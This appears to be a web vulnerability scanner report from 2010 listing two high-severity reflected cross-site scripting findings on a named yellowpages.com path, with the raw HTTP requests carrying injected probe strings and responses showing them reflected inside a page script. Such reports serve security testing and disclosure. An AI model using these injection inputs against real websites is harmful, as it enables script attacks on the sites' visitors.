1. Cross-site scripting (reflected)
1.1. http://www.yellowpages.com/nogeo/Restaurants [REST URL parameter 1]
1.2. http://www.yellowpages.com/nogeo/Restaurants [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://www.yellowpages |
Path: | /nogeo/Restaurants |
GET /nogeo293e8<img%20src%3da Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 17 Dec 2010 19:20:03 GMT Status: 200 OK Server: nginx Content-Type: text/html; charset=utf-8 ETag: "44ddd43708dfeee3ed1 Cache-Control: no-cache Set-Cookie: search_terms=Restaurants; path=/ Set-Cookie: parity_analytics=---+%0A Set-Cookie: vrid=9277b7f0-ec40-012d Set-Cookie: _parity_session Set-Cookie: b=10013; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT X-Urid: d-92410b00-ec40-012d-a6cf Expires: Fri, 17 Dec 2010 19:20:02 GMT Connection: close Content-Length: 204313 <!DOCTYPE html> <html> <head> <title>No Location Found - YELLOWPAGES.COM</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="" name="description" /> <meta con ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.yellowpages |
Path: | /nogeo/Restaurants |
GET /nogeo/Restaurants94856"%3b437e4e94e0c HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Fri, 17 Dec 2010 19:20:10 GMT Status: 200 OK Server: nginx Content-Type: text/html; charset=utf-8 ETag: "09e20413fdd9b57a0d0 Cache-Control: no-cache Set-Cookie: location=geo_term Set-Cookie: parity_analytics=---+%0A Set-Cookie: vrid=96e180a0-ec40-012d Set-Cookie: _parity_session Set-Cookie: b=10013; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT X-Urid: d-96d30d90-ec40-012d-f280 Expires: Fri, 17 Dec 2010 19:20:09 GMT Connection: close Content-Length: 204961 <!DOCTYPE html> <html> <head> <title>No Matches Found - YELLOWPAGES.COM</title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> <meta content="" name="description" /> <meta cont ...[SNIP]... <!-- / INSERT DATA HERE IN THE FORM: --> bk_addPageCtx("q", "Restaurants94856";437e4e94e0c"); <!-- / SEND CLIENT ID HERE --> ...[SNIP]... |